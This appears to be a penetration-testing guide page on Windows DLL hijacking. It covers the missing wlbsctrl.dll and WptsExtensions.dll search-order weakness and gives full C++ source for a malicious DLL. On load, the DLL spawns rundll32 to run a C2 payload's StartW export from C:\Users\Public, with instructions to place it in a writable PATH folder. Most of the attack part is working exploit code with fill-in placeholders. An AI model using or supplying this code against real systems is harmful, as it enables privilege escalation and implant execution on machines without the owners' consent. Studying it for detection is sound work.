DLL Hijacking
A DLL hijack becomes possible when a directory within the “standard search order” is writable by a malicious actor. The attack is greatly simplified when a DLL the loader looks for is missing from the target system. This occurs in older versions of Microsoft Windows (Vista, 7, and 8) with wlbsctrl.dll. Newer versions of Windows have a similarly predictable issue with the “schedule” service and WptsExtensions.dll.
Process
The IEEXT service attempts to call the “main” function in wlbsctrl.dll. This entry point is not compatible with the DLL payloads produced by prevalent C2 frameworks, so a custom DLL is needed to invoke the “StartW” method. Compile a DLL from a modified version of the code snippet below, providing (1) the correct payload location and (2) a unique mutex name. Place the malicious DLL into the insecure PATH folder.
#include <windows.h>
#include <string>
#include <iostream>
#include "Shlwapi.h"
#include "shlobj.h"
#include "pch.h"
DWORD WINAPI executeProcess(LPVOID lpParam);
// DLL entry point. On DLL_PROCESS_ATTACH it calls executeProcess() synchronously on the
// loader's thread, i.e. while the loader lock is held. executeProcess() calls CreateProcess,
// which the DllMain documentation advises against; this is a common reason DLLs written this
// way hang or behave unreliably. Thread attach/detach and process detach are no-ops.
// hModule and lpReserved are unused. Always returns TRUE, so the host never rejects the load.
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
executeProcess(NULL); //When main is called, go to executeProcess (the argument is never read there)
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
// Helper that always returns 1. Nothing visible on this page references it;
// presumably kept as a placeholder for an export the host looks up — TODO confirm.
DWORD Return1() {
return 1;
}
//Spawns a new process: launches rundll32.exe on a payload DLL so that its StartW export runs.
// lpParam is never read. Returns 0 when the mutex already exists (a second instance is
// suppressed) or when CreateProcess succeeds; returns 1 when CreateProcess fails.
// From a defender's view the observable artifact is rundll32.exe appearing as a child of
// the hijacked host process with a command line pointing into C:\Users\Public.
DWORD WINAPI executeProcess(LPVOID lpParam) {
// Zero-initialised, but info.cb is never set to sizeof(STARTUPINFO), which CreateProcess expects.
STARTUPINFO info = { 0 };
// Left uninitialised; filled in by CreateProcess on success. The hProcess/hThread
// handles it receives are never closed.
PROCESS_INFORMATION processInfo;
//Create a uniquely named mutex. The handle is neither stored nor closed, so the mutex
// stays alive for the lifetime of this process; its name acts as a single-instance guard.
CreateMutexA(0, FALSE, "Local\\<UNIQUE_NAME>");
if (GetLastError() == ERROR_ALREADY_EXISTS)
{
return 0; // Another instance already owns the mutex: do nothing.
}
else
{
//If using as a .dll hijack only use/manipulate the following code
// Hard-coded command line; <payload.dll> is the placeholder the text above asks the reader to replace.
std::wstring rundllStart = L"C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\<payload.dll>,StartW";
//Spawn the new process
// The C-style cast discards const on c_str(); CreateProcessW is documented as possibly writing
// to the command-line buffer, so passing it this way is technically undefined. CreateProcess
// resolves to CreateProcessW here (an LPWSTR argument would not compile without UNICODE).
// bInheritHandles is TRUE, so inheritable handles of the host process flow into rundll32.
BOOL hR = CreateProcess(NULL, (LPWSTR)rundllStart.c_str(), NULL, NULL, TRUE, 0, NULL, NULL, &info, &processInfo);
if (hR == 0) {
return 1; // CreateProcess failed; GetLastError() is not consulted.
}
}
return 0;
}